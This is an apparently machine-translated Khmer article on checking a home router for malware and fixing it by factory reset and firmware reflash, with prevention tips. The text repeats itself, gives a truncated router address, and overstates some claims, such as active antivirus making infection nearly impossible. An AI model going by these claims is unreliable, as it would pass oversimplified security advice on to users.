ភ្ជាប់កុំព្យូទ័រទៅរ៉ោតទ័រដោយប្រើខ្សែ LAN ។ ខ្សែ LAN ត្រូវបានរួមបញ្ចូលជាមួយរ៉ោតទ័រណាមួយ។ ឬតាមរយៈ Wi-Fi ប្រសិនបើមិនមានលទ្ធភាពនៃការតភ្ជាប់ខ្សែ។ វាជាការល្អប្រសើរជាងមុនដើម្បីភ្ជាប់ជាមួយខ្សែ!ការតភ្ជាប់ឥតខ្សែត្រូវបានចាត់ទុកថាមិនស្ថិតស្ថេរ និងមិនសមរម្យសម្រាប់កម្មវិធីបង្កប់រ៉ោតទ័រ។

បន្ទាប់ពីយើងបានភ្ជាប់ទៅរ៉ោតទ័រហើយ សូមបើកកម្មវិធីរុករកតាមអ៊ីនធឺណិត (Chrome, Opera, Mozilla, IE) ហើយបញ្ចូលអាសយដ្ឋានរបស់រ៉ោតទ័រ ASUS នៅក្នុងរបារអាសយដ្ឋានសម្រាប់ Asus វាគឺ 192.168។ ចូល: admin, ពាក្យសម្ងាត់: admin ។ ប្រសិនបើ​ឈ្មោះ​អ្នក​ប្រើ​និង​ពាក្យ​សម្ងាត់​មិន​សម​ទេ សូម​សួរ​អ្នក​ដែល​ដំឡើង​រ៉ោតទ័រ​របស់​អ្នក ប្រហែល​ជា​គាត់​បាន​ប្ដូរ​ពួកវា។

ទាញយកកម្មវិធីបង្កប់ពីគេហទំព័ររបស់អ្នកផលិត ហើយជ្រើសរើសកម្មវិធីបង្កប់នៅលើថាសដោយប្រើទំព័រការកំណត់រ៉ោតទ័រ។ សម្រាប់រ៉ោតទ័រភាគច្រើន ជំហានកម្មវិធីបង្កប់គឺដូចគ្នា។

បញ្ហានៅពេលចែកចាយ Wi-Fi ដោយប្រើរ៉ោតទ័រកើតឡើងដោយសារហេតុផលផ្សេងៗ។ មួយក្នុងចំណោមពួកគេគឺការឆ្លងនៃឧបករណ៍ចែកចាយជាមួយនឹងមេរោគដែលអ្នកអាចកម្ចាត់ដោយខ្លួនឯង។

  • មេរោគដែលបន្ថយល្បឿនអ៊ីនធឺណិតតាមវិធីផ្សេងៗ។ ជាឧទាហរណ៍ កម្មវិធីព្យាបាទបែបនេះបំផ្លាញការកំណត់កម្មវិធីបង្កប់ ឬចាប់ផ្តើមទាញយកមាតិកាមេរោគផ្សាយពាណិជ្ជកម្មមួយចំនួនទៅកុំព្យូទ័រ។
  • មេរោគដែលជំនួសអាសយដ្ឋានគេហទំព័រ។ វាមើលទៅដូចនេះ៖ អ្នកប្រើប្រាស់ចូលទៅកាន់គេហទំព័រសុវត្ថិភាពណាមួយដែលគេស្គាល់ ហើយមេរោគផ្លាស់ប្តូរ DNS តាមរបៀបដែលអ្នកប្រើប្រាស់ចូលទៅកាន់គេហទំព័រផ្សាយពាណិជ្ជកម្ម ឬឃើញបដាផ្សាយពាណិជ្ជកម្មដែលម្ចាស់គេហទំព័រមិនបានដាក់វា។ មេរោគបែបនេះក៏មានគ្រោះថ្នាក់ផងដែរព្រោះវាអាចផ្ទេរអ្នកទៅកាន់គេហទំព័រដែលមានមេរោគផ្សេងទៀត។

ក្នុងករណីណាក៏ដោយ ប្រសិនបើអ្នកសម្គាល់ឃើញប្រតិបត្តិការមិនត្រឹមត្រូវនៃរ៉ោតទ័រ អ្នកគួរតែពិនិត្យមើលវាសម្រាប់មេរោគ ជាពិសេសព្រោះវាងាយស្រួលណាស់ក្នុងការកម្ចាត់ពួកវា។

តើមេរោគចូលទៅក្នុងរ៉ោតទ័រដោយរបៀបណា

រ៉ោតទ័រផ្តល់អ៊ីនធឺណិតដល់ឧបករណ៍ទាំងអស់ដែលភ្ជាប់ទៅវា។ នេះមានន័យថាឧបករណ៍ទាំងអស់ និងរ៉ោតទ័រខ្លួនឯងគឺនៅលើបណ្តាញផ្ទះតែមួយ។ នេះគឺជាអ្វីដែលមេរោគប្រើ៖ វាចូលទៅក្នុងកុំព្យូទ័រពីគេហទំព័រមួយចំនួន ឬឯកសារដែលបានទាញយក ហើយបន្ទាប់មកវាត្រូវបានបញ្ជូនតាមបណ្តាញទៅរ៉ោតទ័រ ដែលវាចាប់ផ្តើមលេងល្បិចកខ្វក់។ ដំណើរការនេះអាស្រ័យលើគំរូមេរោគ ជាឧទាហរណ៍ កម្មវិធីព្យាបាទមួយចំនួនមិនរកឃើញដោយខ្លួនឯងនៅលើកុំព្យូទ័រនោះទេ ប៉ុន្តែចាប់ផ្តើមធ្វើសកម្មភាពតែនៅពេលដែលពួកគេចូលទៅក្នុងរ៉ោតទ័រប៉ុណ្ណោះ ខណៈពេលដែលកម្មវិធីផ្សេងទៀតអាចប៉ះពាល់ដល់ប្រព័ន្ធប្រតិបត្តិការ និងកម្មវិធីបង្កប់របស់រ៉ោតទ័រ។ ក្នុង​ពេល​តែមួយ។

ពិនិត្យរ៉ោតទ័រ

មុនពេលសម្អាតរ៉ោតទ័រពីមេរោគ អ្នកត្រូវពិនិត្យមើលថាតើពួកវាមាននៅលើវាដែរឬទេ។ ដើម្បីដឹងលទ្ធផល អ្នកត្រូវប្រើអ៊ីនធឺណិតដោយផ្ទាល់តាមរយៈកុំព្យូទ័រ។ នោះគឺដកខ្សែ WLAN ឬម៉ូដឹមចេញពីរ៉ោតទ័រ ហើយបញ្ចូលវាទៅក្នុងច្រកកុំព្យូទ័រ ហើយបន្ទាប់មកធ្វើតាមជំហានទាំងនេះ៖

ប្រសិនបើអ្នកកំពុងជួបប្រទះបញ្ហាល្បឿន សូមអនុវត្តតាមជំហានទាំងបីនេះ។

  1. ពិនិត្យល្បឿនអ៊ីនធឺណិតរបស់អ្នក។ នេះត្រូវធ្វើដើម្បីរកមើលនៅពេលអនាគតថាតើល្បឿនដូចគ្នានៅពេលប្រើបណ្តាញដោយផ្ទាល់ និងតាមរយៈរ៉ោតទ័រ។ ឧទាហរណ៍ អ្នកអាចទាញយកឯកសារ ឬប្រើប្រាស់សេវាកម្មពិសេស Speedtest លើអ៊ីនធឺណិត។

    យើងស្កេនល្បឿនអ៊ីនធឺណែតតាមរយៈគេហទំព័រ Speedtest

  2. ដើម្បីកំណត់គុណភាពនៃសញ្ញាឱ្យកាន់តែច្បាស់ អ្នកត្រូវដឹងពីអត្រា ping ។ Ping គឺជាពេលវេលាដែលវាត្រូវការសម្រាប់ការបញ្ជូនសញ្ញាពីឧបករណ៍របស់អ្នក ទៅដល់ម៉ាស៊ីនមេ និងត្រលប់មកវិញ។ តាមធម្មជាតិ វាកាន់តែធំ វាកាន់តែអាក្រក់សម្រាប់អ្នក។ បើកប្រអប់បញ្ចូលពាក្យបញ្ជាវាយពាក្យបញ្ជា ping ip ហើយដំណើរការវា។ អាសយដ្ឋាន IP នៃការតភ្ជាប់របស់អ្នក លំនាំដើមជាធម្មតាគឺ 192.168.0.1 ប៉ុន្តែអាចប្រែប្រួល។ ចងចាំលទ្ធផល។ តម្លៃ ping ធម្មតារហូតដល់ 40 ms គឺជាសូចនាករដ៏ល្អ 40-110 ms គឺជាតម្លៃមធ្យមធម្មតាលើសពី 110 ms - អ្នកគួរតែគិតអំពីការកំណត់បណ្តាញឡើងវិញ ធ្វើអោយប្រសើរឡើងនូវសញ្ញា ឬផ្លាស់ប្តូរអ្នកផ្តល់សេវា។

    ប្រតិបត្តិពាក្យបញ្ជា ping ip

  3. បន្ទាប់ពីបញ្ជីកញ្ចប់ដែលបានផ្ញើ អ្នកនឹងឃើញស្ថិតិ។ អ្នកចាប់អារម្មណ៍លើបន្ទាត់ "កញ្ចប់" វារាប់ចំនួនកញ្ចប់ដែលត្រូវបានផ្ញើ បាត់ បញ្ចប់។ ប្រសិនបើចំនួននៃកញ្ចប់ដែលបាត់បង់លើសពី 5% អ្នកត្រូវរកឱ្យឃើញនូវអ្វីដែលជាបញ្ហា។ ប្រសិនបើកញ្ចប់ព័ត៌មានមួយចំនួនធំមិនទៅដល់ម៉ាស៊ីនមេ ឬត្រឡប់មកវិញ វានឹងប៉ះពាល់ដល់ល្បឿនអ៊ីនធឺណិតយ៉ាងខ្លាំង។

    សូមមើលថាតើកញ្ចប់ឯកសារប៉ុន្មានភាគរយត្រូវបានបាត់បង់

បន្ទាប់ពីអ្នកពិពណ៌នាជំហានខាងលើទាំងអស់ ទទួលបានព័ត៌មានលម្អិតអំពី ping ចំនួនកញ្ចប់ព័ត៌មានដែលបាត់បង់ និងល្បឿនអ៊ីនធឺណិត ភ្ជាប់ខ្សែ WLAN ឬម៉ូដឹមឡើងវិញទៅរ៉ោតទ័រ ហើយពិនិត្យមើលសូចនាករដូចគ្នាទាំងអស់នៅពេលភ្ជាប់តាមរយៈ Wi-Fi ។ ប្រសិនបើប៉ារ៉ាម៉ែត្រគឺប្រហែលនៅកម្រិតដូចគ្នា នោះបញ្ហាមិនស្ថិតនៅលើរ៉ោតទ័រទេ ប្រហែលជាហេតុផលគឺនៅខាងប្រតិបត្តិករ។ បើមិនដូច្នេះទេ ប្រសិនបើបញ្ហាជាមួយអ៊ីនធឺណិតកើតឡើងនៅពេលប្រើវាតាមរយៈរ៉ោតទ័រ អ្នកត្រូវធ្វើការកំណត់ឡើងវិញពីរោងចក្រ និងសម្អាតមេរោគ។

ការដកមេរោគ

ដើម្បីលុបមេរោគ អ្នកត្រូវកំណត់ការកំណត់ឡើងវិញទៅតម្លៃលំនាំដើម។ ប្រសិនបើមេរោគអាចបំផ្លាញកម្មវិធីបង្កប់ អ្នកនឹងត្រូវដំឡើងវាម្តងទៀតដោយខ្លួនឯង។

កំណត់ប៉ារ៉ាម៉ែត្រឡើងវិញ

  1. រកមើលប៊ូតុងកំណត់ឡើងវិញនៅខាងក្រោយរ៉ោតទ័រ។ ជាធម្មតាវាតូចជាងអ្វីផ្សេងទៀតទាំងអស់។ វាត្រូវតែសង្កត់រយៈពេល 10-15 វិនាទី។ នៅពេលដែលរ៉ោតទ័របិទ ហើយចាប់ផ្តើមដំណើរការឡើងវិញ អ្នកអាចបញ្ចេញវាបាន។ ការចាប់ផ្ដើមរ៉ោតទ័រឡើងវិញនឹងជូនដំណឹងអ្នកថាការកំណត់ត្រូវបានកំណត់ឡើងវិញ។ សូមចំណាំថាពាក្យសម្ងាត់ដែលបានកំណត់ក៏នឹងត្រូវបាត់បង់ផងដែរ។

    ចុចប៊ូតុងកំណត់ឡើងវិញ

  2. ដើម្បីកំណត់រចនាសម្ព័ន្ធរ៉ោតទ័រឡើងវិញ អ្នកត្រូវភ្ជាប់វាទៅកុំព្យូទ័រតាមរយៈខ្សែ ហើយបន្ទាប់មកបើកកម្មវិធីរុករកហើយចូលទៅកាន់ http://192.168.0.1 ។ ប្រហែលជាអាសយដ្ឋាននឹងខុសគ្នា អ្នកអាចរកឃើញវានៅលើស្ទីគ័រដែលមានទីតាំងនៅលើរ៉ោតទ័រខ្លួនឯង ឬនៅក្នុងឯកសារដែលភ្ជាប់មកជាមួយរ៉ោតទ័រ។ អ្នកនឹងត្រូវបានសួរសម្រាប់ការចូល និងពាក្យសម្ងាត់ តាមលំនាំដើម ការចូលគឺអ្នកគ្រប់គ្រង ហើយពាក្យសម្ងាត់គឺអ្នកគ្រប់គ្រង ឬ 12345។ សម្រាប់ព័ត៌មានលម្អិត សូមមើលការណែនាំសម្រាប់រ៉ោតទ័រ។
  3. ចូលទៅកាន់ការដំឡើងរហ័ស។ បញ្ជាក់ជម្រើសដែលសាកសមនឹងអ្នក។ ប្រសិនបើអ្នកចង់ កំណត់ពាក្យសម្ងាត់ ហើយប្តូរឈ្មោះបណ្តាញ។ បន្ទាប់ពីឆ្លងកាត់នីតិវិធីដំឡើងរួច រក្សាទុកការផ្លាស់ប្តូរ ហើយចាប់ផ្ដើមរ៉ោតទ័រឡើងវិញ។

    ចូលទៅកាន់ផ្នែក "ការដំឡើងរហ័ស" ហើយកំណត់ការកំណត់ងាយស្រួល

បន្ទាប់ពីបញ្ចប់ជំហានទាំងអស់ខាងលើ សូមពិនិត្យមើលថាតើអ្នកបានកម្ចាត់កំហុសឬអត់។ ប្រសិនបើមិនមែនទេ នោះអ្នកនឹងត្រូវ reflash រ៉ោតទ័រដោយដៃ។

ការបំភ្លឺរ៉ោតទ័រ

កម្មវិធីបង្កប់នៃរ៉ោតទ័រគឺអាចធ្វើទៅបានលុះត្រាតែឧបករណ៍ត្រូវបានភ្ជាប់ទៅកុំព្យូទ័រដោយប្រើខ្សែ។ អ្នកមិនអាចអាប់ដេតកម្មវិធីបង្កប់តាម Wi-Fi បានទេ។

  1. មានស្ទីគ័រនៅខាងក្រោយរ៉ោតទ័រ។ ស្វែងរកគំរូរ៉ោតទ័ររបស់អ្នកនៅលើវា។ វាក៏មានព័ត៌មានអំពីកំណែនៃកម្មវិធីបង្កប់ដែលបានដំឡើងដំបូងផងដែរ។ ប្រសិនបើកំណែរបស់វាគឺ 7 នោះវាជាការប្រសើរក្នុងការដំឡើងការអាប់ដេតសម្រាប់កំណែ 7 ដើម្បីជៀសវាងការប៉ះទង្គិចជាមួយកម្មវិធីបង្កប់ថ្មីពេកជាមួយផ្នែករឹងចាស់របស់រ៉ោតទ័រ។

    ស្វែងយល់ពីកំណែកម្មវិធីបង្កប់ និងម៉ូដែលរបស់រ៉ោតទ័រ

  2. ចូលទៅកាន់គេហទំព័ររបស់អ្នកផលិត ហើយប្រើប្រអប់ស្វែងរកដើម្បីស្វែងរកកំណែត្រឹមត្រូវសម្រាប់ម៉ូដែលរបស់អ្នក។ ទាញយកវាទៅកុំព្យូទ័ររបស់អ្នក។

    ស្វែងរក និងទាញយកកំណែកម្មវិធីបង្កប់ដែលត្រូវការ

  3. ឯកសារដែលបានទាញយកនឹងត្រូវបានទុកក្នុងប័ណ្ណសារ។ ស្រង់មាតិការបស់វាទៅថតឯកសារងាយស្រួលណាមួយ។

    បញ្ជាក់ផ្លូវទៅកាន់កម្មវិធីបង្កប់

  4. ចាប់ផ្តើមដំណើរការអាប់ដេត ហើយរង់ចាំឱ្យវាបញ្ចប់។ ចាប់ផ្ដើមរ៉ោតទ័ររបស់អ្នកឡើងវិញ។ កម្មវិធីបង្កប់គួរតែត្រូវបានអាប់ដេត ហើយបញ្ហា និងមេរោគទាំងអស់ទំនងជានឹងបាត់ទៅវិញ។

    យើងកំពុងរង់ចាំការដំឡើងបញ្ចប់

វីដេអូ៖ របៀបបញ្ចេញរ៉ោតទ័រ

វិធីការពាររ៉ោតទ័ររបស់អ្នកពីមេរោគនៅពេលអនាគត

មធ្យោបាយតែមួយគត់ដើម្បីការពាររ៉ោតទ័រពីមេរោគគឺការពារពួកវាពីការជ្រៀតចូលកុំព្យូទ័រ។ កុំព្យូទ័ររបស់អ្នកត្រូវបានការពារដោយកំចាត់មេរោគ។ ដំឡើង និងមិនស្ថិតក្រោមកាលៈទេសៈណាក៏ដោយ បិទកំចាត់មេរោគទំនើបណាមួយឡើយ។ វាស្ទើរតែមិនអាចទៅរួចទេក្នុងការចាប់កម្មវិធីព្យាបាទដោយប្រើកំចាត់មេរោគដែលបានធ្វើឱ្យសកម្ម។ វាមិនចាំបាច់សូម្បីតែប្រើកម្មវិធីសុវត្ថិភាពដែលបានបង់ទេនៅក្នុងសម័យរបស់យើងមាន analogues ឥតគិតថ្លៃដែលមានគុណភាពខ្ពស់គ្រប់គ្រាន់។

អ្វីដែលត្រូវធ្វើប្រសិនបើគ្មានអ្វីជួយ

ប្រសិនបើការអនុវត្តសេចក្តីណែនាំខាងលើទាំងអស់មិនបាននាំមកនូវលទ្ធផលដែលចង់បានទេ ជម្រើសពីរនៅតែមាន៖ បញ្ហាកើតឡើងដោយសារតែការបែកធ្លាយផ្នែករាងកាយរបស់រ៉ោតទ័រ ឬកំហុសនៅខាងអ្នកផ្តល់សេវា។ ជាដំបូង អ្នកគួរតែទូរស័ព្ទទៅក្រុមហ៊ុនដែលផ្ដល់ឱ្យអ្នកនូវអ៊ីនធឺណិត ហើយប្រាប់ពួកគេអំពីបញ្ហារបស់អ្នក និងវិធីសាស្រ្តដែលមិនបានជួយដោះស្រាយវា។ ទីពីរ រ៉ោតទ័រ គួរតែត្រូវបានយកទៅសេវាពិសេស ដែលត្រូវពិនិត្យដោយអ្នកឯកទេស។

ការឆ្លងមេរោគរ៉ោតទ័រគឺកម្រណាស់ ប៉ុន្តែមានគ្រោះថ្នាក់។ មានវិធីពីរយ៉ាងដើម្បីកម្ចាត់មេរោគ៖ កំណត់ការកំណត់ឡើងវិញ និងធ្វើបច្ចុប្បន្នភាពកម្មវិធីបង្កប់។ អ្នកក៏ត្រូវប្រាកដថាមេរោគមិននៅតែមាននៅលើកុំព្យូទ័រ។

ក្នុងអំឡុងពេលចែកចាយអ៊ីនធឺណិតតាមរយៈ Wi-Fi តាមរយៈរ៉ោតទ័រ បញ្ហាផ្សេងៗអាចលេចឡើង។ ជាឧទាហរណ៍ ការយឺតយ៉ាវ និង ping ខ្ពស់អាចកើតឡើងដោយសារមេរោគឆ្លងឧបករណ៍ចែកចាយ។ ចូរយើងពិនិត្យមើលឱ្យកាន់តែច្បាស់អំពីរបៀបសម្អាតរ៉ោតទ័រដោយខ្លួនឯង។

រោគសញ្ញា

ឧបករណ៍អាចឆ្លងមេរោគប្រភេទដូចខាងក្រោមៈ

  • បន្ថយល្បឿនផ្ទេរទិន្នន័យ។ ឧទាហរណ៍ មេរោគមានសមត្ថភាពក្នុងការគោះការកំណត់ វានឹងមានល្បឿនទាប ការបាត់បង់សញ្ញា។ល។
  • ការជំនួសអាសយដ្ឋានគេហទំព័រ។ វាកើតឡើងដូចនេះ៖ មនុស្សម្នាក់ចូលទៅកាន់ធនធាន ហើយកម្មវិធីព្យាបាទផ្លាស់ប្តូរ DNS ហើយអ្នកប្រើប្រាស់ត្រូវបានបញ្ជូនបន្តទៅកាន់គេហទំព័រដែលមានការផ្សាយពាណិជ្ជកម្ម ឬប្លុកផ្សាយពាណិជ្ជកម្មដែលដាក់ដោយម្ចាស់គេហទំព័រអាចមើលឃើញចំពោះគាត់។ មេរោគនេះក៏មានគ្រោះថ្នាក់ផងដែរព្រោះវាអាចបញ្ជូនបន្តទៅកាន់ធនធានដែលមានខ្លឹមសារព្យាបាទផ្សេងទៀត។


ក្នុងករណីណាក៏ដោយ ប្រសិនបើរ៉ោតទ័រមិនស្ថិតស្ថេរ ចាំបាច់ត្រូវពិនិត្យមើលវាសម្រាប់មេរោគ ដែលវាងាយស្រួលដកចេញណាស់។

តើការឆ្លងមេរោគកើតឡើងយ៉ាងដូចម្តេច?

រ៉ោតទ័រចែកចាយអ៊ីនធឺណិតទៅឧបករណ៍ទាំងអស់ដែលភ្ជាប់ទៅវា។ នេះមានន័យថាឧបករណ៍ទាំងអស់ដំណើរការលើបណ្តាញមូលដ្ឋានដូចគ្នា។ មេរោគប្រើវា៖ វាចូលទៅក្នុងកុំព្យូទ័រតាមរយៈគេហទំព័រ ឬឯកសារដែលបានទាញយក បន្ទាប់មកតាមរយៈបណ្តាញ វាចូលទៅក្នុងរ៉ោតទ័រ ដែលវាធ្វើសកម្មភាពព្យាបាទ។

ភាពធ្ងន់ធ្ងរនៃស្ថានភាពអាស្រ័យទៅលើកំណែនៃកម្មវិធីមេរោគ ជាឧទាហរណ៍ សត្វល្អិតខ្លះប្រព្រឹត្តិដោយសម្ងាត់ ហើយចាប់ផ្តើមធ្វើសកម្មភាពតែម្តងគត់នៅពេលដែលវាស្ថិតនៅក្នុងរ៉ោតទ័រ ចំណែកអ្នកផ្សេងទៀត ផ្ទុយទៅវិញអាចធ្វើឱ្យខូចប្រព័ន្ធប្រតិបត្តិការតាមផ្លូវ។

ពិនិត្យឧបករណ៍បណ្តាញសម្រាប់ការឆ្លង

មុនពេលសម្អាតឧបករណ៍ពីមេរោគ អ្នកត្រូវពិនិត្យមើលរ៉ោតទ័រសម្រាប់វត្តមានរបស់វា។ ដើម្បីធ្វើដូចនេះអ្នកត្រូវភ្ជាប់ខ្សែអ៊ីនធឺណិតទៅច្រកកុំព្យូទ័រដោយផ្ទាល់។ ទាញខ្សែ WLAN ចេញពីរ៉ោតទ័រ ហើយភ្ជាប់វាទៅកុំព្យូទ័រ ហើយបន្ទាប់មកធ្វើឧបាយកលដូចខាងក្រោម៖

  • បើកដំណើរការកម្មវិធីរុករករបស់អ្នក ហើយបើកគេហទំព័រជាច្រើន។ ត្រូវប្រាកដថាខ្លឹមសាររបស់ពួកគេត្រឹមត្រូវ ហើយមិនមានការជំនួសគេហទំព័រ អង្គភាពផ្សាយពាណិជ្ជកម្មទេ។ សម្រាប់គោលបំណងនៃការផ្ទៀងផ្ទាត់ វាជាការប្រសើរក្នុងការជ្រើសរើសធនធានដែលវត្តមាននៃការផ្សាយពាណិជ្ជកម្មមិនអាចមាន។
  • ចាប់ផ្តើមស្កេនកុំព្យូទ័ររបស់អ្នកជាមួយនឹងកម្មវិធីកំចាត់មេរោគ។ នេះគឺចាំបាច់ដើម្បីកំណត់ផ្លូវនៃការឆ្លង - ពីកុំព្យូទ័រឬពីរ៉ោតទ័រ។ សូមចងចាំថា វាអាចមានមេរោគជាច្រើន ហើយពួកវាអាចមានវត្តមានទាំងនៅក្នុងប្រព័ន្ធ និងនៅក្នុងឧបករណ៍បណ្តាញ។


ការដកមេរោគ

មើលវីដេអូអំពីការឆ្លងរ៉ោតទ័រជាមួយមេរោគនៅទីនេះ៖

ដើម្បីលុបមេរោគ អ្នកត្រូវកំណត់ការកំណត់ឡើងវិញទៅដូចដើម។ ប្រសិនបើកម្មវិធីមេរោគបានបង្កគ្រោះថ្នាក់ដល់កម្មវិធីបង្កប់រួចហើយ វានឹងចាំបាច់ត្រូវដំឡើងឡើងវិញ។

កំណត់ប៉ារ៉ាម៉ែត្រឡើងវិញ

ដើម្បីសម្អាតរ៉ោតទ័រ អ្នកត្រូវកំណត់ការកំណត់របស់វាឡើងវិញ៖

  • ស្វែងរកប៊ូតុងកំណត់ឡើងវិញនៅខាងក្រោយឧបករណ៍។ ជារឿយៗនាងឈរចេញពីហ្វូងមនុស្ស។ សង្កត់វាឱ្យជាប់រហូតទាល់តែរ៉ោតទ័រកំណត់ឡើងវិញ និងចាប់ផ្ដើមឡើងវិញ។ សូមចងចាំថា នៅពេលអ្នកចាប់ផ្តើមឡើងវិញ ការកំណត់ទាំងអស់នឹងបាត់បង់ ហើយរ៉ោតទ័រនឹងត្រូវកំណត់រចនាសម្ព័ន្ធម្តងទៀត។


  • ដើម្បីកំណត់រចនាសម្ព័ន្ធរ៉ោតទ័រអ្នកត្រូវភ្ជាប់វាទៅកុំព្យូទ័រដោយប្រើខ្សែបន្ទាប់មកបើកកម្មវិធីរុករកហើយវាយអាសយដ្ឋាន 192.168.0.1 ។ វាអាចមានភាពខុសប្លែកគ្នា ហើយត្រូវបានចង្អុលបង្ហាញនៅលើរ៉ោតទ័រខ្លួនឯង ឬនៅក្នុងឯកសារសម្រាប់វានៅក្នុងការណែនាំ។ នៅពេលចូលទៅក្នុងការកំណត់ ពួកគេតែងតែបញ្ចូលការចូលគ្រប់គ្រង ហើយពាក្យសម្ងាត់គឺដូចគ្នា ឬ 12345។ ប្រសិនបើអ្នកបរាជ័យក្នុងការបញ្ចូល នោះអ្នកគួរតែពិនិត្យមើលការណែនាំសម្រាប់ឧបករណ៍បណ្តាញ។


  • ស្វែងរកជម្រើសការកំណត់រហ័ស។ ជ្រើសរើសធាតុដែលអាចអនុវត្តបានទាំងអស់។ អ្នកក៏អាចផ្លាស់ប្តូរពាក្យសម្ងាត់ និងឈ្មោះបណ្តាញផងដែរ។ បន្ទាប់ពីបញ្ចប់ដំណើរការកំណត់រចនាសម្ព័ន្ធ សូមរក្សាទុកពួកវា ហើយចាប់ផ្ដើមរ៉ោតទ័រឡើងវិញ។


បន្ទាប់ពីបញ្ចប់ជំហានទាំងអស់ដែលបានពិពណ៌នា សូមពិនិត្យមើលថាតើអ្នកបានកម្ចាត់បញ្ហាឬអត់។ បើមិនដូច្នោះទេអ្នកនឹងត្រូវបញ្ចេញឧបករណ៍បណ្តាញ។

តើ​ធ្វើ​ដូចម្តេច​ដើម្បី​អនុវត្ត​ពន្លឺ​មួយ​?

វាកើតឡើងដែលកម្មវិធីមេរោគផ្លាស់ប្តូរកម្មវិធីបង្កប់នៅលើរ៉ោតទ័រ។ អ្នក​អាច​បន្សាប​កំណែ​ដែល​មាន​មេរោគ​ដោយ​បញ្ចេញ​វា​។

ភ្ជាប់កុំព្យូទ័ររបស់អ្នកទៅរ៉ោតទ័រតាមរយៈខ្សែ LAN ។ វាគួរតែត្រូវបានរួមបញ្ចូលជាមួយរ៉ោតទ័រណាមួយ។ បើមិនដូច្នេះទេ អ្នកអាចប្រើការភ្ជាប់ Wi-Fi ។ ទោះយ៉ាងណាក៏ដោយ ការភ្ជាប់ខ្សែនឹងល្អជាង។


បន្ទាប់ពីភ្ជាប់ទៅរ៉ោតទ័រ សូមបើកកម្មវិធីរុករកតាមអ៊ីនធឺណិត ហើយបញ្ចូលតម្លៃ 192.168.1.1 (ឬមួយផ្សេងទៀតដែលបានបញ្ជាក់នៅលើឧបករណ៍ខ្លួនវា) នៅក្នុងវាលអាសយដ្ឋាន បន្ទាប់មកអ្នកនឹងត្រូវបញ្ចូលពាក្យសម្ងាត់ ហើយចូលដើម្បីបើកការកំណត់រ៉ោតទ័រ។ ឈ្មោះអ្នកប្រើ និងពាក្យសម្ងាត់លំនាំដើមគឺអ្នកគ្រប់គ្រង។ ប្រសិនបើអ្នកមិនអាចបញ្ចូលការកំណត់បានទេ អ្នកត្រូវស្វែងរកព័ត៌មានលម្អិតនៃការចូលបច្ចុប្បន្ន ប្រហែលជាបន្ទាប់ពីការដំឡើងចុងក្រោយពួកគេត្រូវបានផ្លាស់ប្តូរ។

ទាញយកកំណែកម្មវិធីបង្កប់ថ្មីពីគេហទំព័ររបស់អ្នកផលិត ហើយចូលទៅកាន់ការកំណត់រ៉ោតទ័រ ហើយជ្រើសរើសវានៅលើថាសកុំព្យូទ័រ។ ដំណើរការកម្មវិធីបង្កប់សម្រាប់រ៉ោតទ័រទាំងអស់គឺដូចគ្នាបេះបិទ។


ការការពារឧបករណ៍បណ្តាញពីមេរោគ

ដើម្បីការពាររ៉ោតទ័ររបស់អ្នកពីការឆ្លង អ្នកអាចប្រើការណែនាំខាងក្រោម៖

  • ធ្វើបច្ចុប្បន្នភាពកម្មវិធីបង្កប់ទៅកំណែចុងក្រោយបំផុត។ ចូលទៅកាន់គេហទំព័ររបស់អ្នកផលិត ស្វែងរកម៉ូដែលរបស់អ្នក និងទាញយកកម្មវិធីបង្កប់ចុងក្រោយបំផុត។
  • កំណត់តម្លៃពាក្យសម្ងាត់ពហុតម្លៃនៅលើចំណុចប្រទាក់គេហទំព័រ។ មិនមែនរ៉ោតទ័រទាំងអស់អនុញ្ញាតឱ្យអ្នកផ្លាស់ប្តូរការចូលរបស់អ្នកទេ។ ទោះយ៉ាងណាក៏ដោយ ប្រសិនបើអ្នកកំណត់ពាក្យសម្ងាត់ស្មុគ្រស្មាញ វានឹងមិនងាយស្រួលទេក្នុងការ hack ចំណុចប្រទាក់គេហទំព័រ។
  • កំណត់ការចូលក្រៅបណ្តាញនៅក្នុងការកំណត់រ៉ោតទ័រ។
  • ផ្លាស់ប្តូរអាសយដ្ឋាន IP របស់រ៉ោតទ័រក្នុងការចូលប្រើមូលដ្ឋាន។ ក្នុងអំឡុងពេលដំណើរការ hack មេរោគនឹងចូលប្រើអាសយដ្ឋានភ្លាមៗដូចជា 192.168.0.1 និង 192.168.1.1។ ដោយផ្អែកលើនេះ វាជាការប្រសើរក្នុងការផ្លាស់ប្តូរ octets ទីបី និងទីបួននៃអាសយដ្ឋាន LAN IP ។
  • ដំឡើងកម្មវិធីកំចាត់មេរោគដែលអាចទុកចិត្តបាននៅលើកុំព្យូទ័ររបស់អ្នក។ ប្រសិនបើមេរោគព្យាយាមចូលទៅក្នុងកុំព្យូទ័រដំបូង វានឹងត្រូវបានយកចេញភ្លាមៗ ដែលនឹងការពារវាមិនឱ្យប៉ះពាល់ដល់រ៉ោតទ័រ។
  • កុំរក្សាទុកពាក្យសម្ងាត់នៅក្នុងកម្មវិធីរុករក។


ដូចដែលអ្នកអាចឃើញការពិនិត្យមើលរ៉ោតទ័រសម្រាប់មេរោគនិងការសម្អាតវាគឺងាយស្រួល។ ប៉ុន្តែវាជាការប្រសើរក្នុងការអនុវត្តតាមគន្លឹះសាមញ្ញដើម្បីការពារការឆ្លងមេរោគ។ ប៉ុន្តែប្រសិនបើរឿងនេះកើតឡើងអ្នកដឹងពីអ្វីដែលត្រូវធ្វើ។

ថ្មីនៅលើគេហទំព័រ

>

ពេញនិយមបំផុត។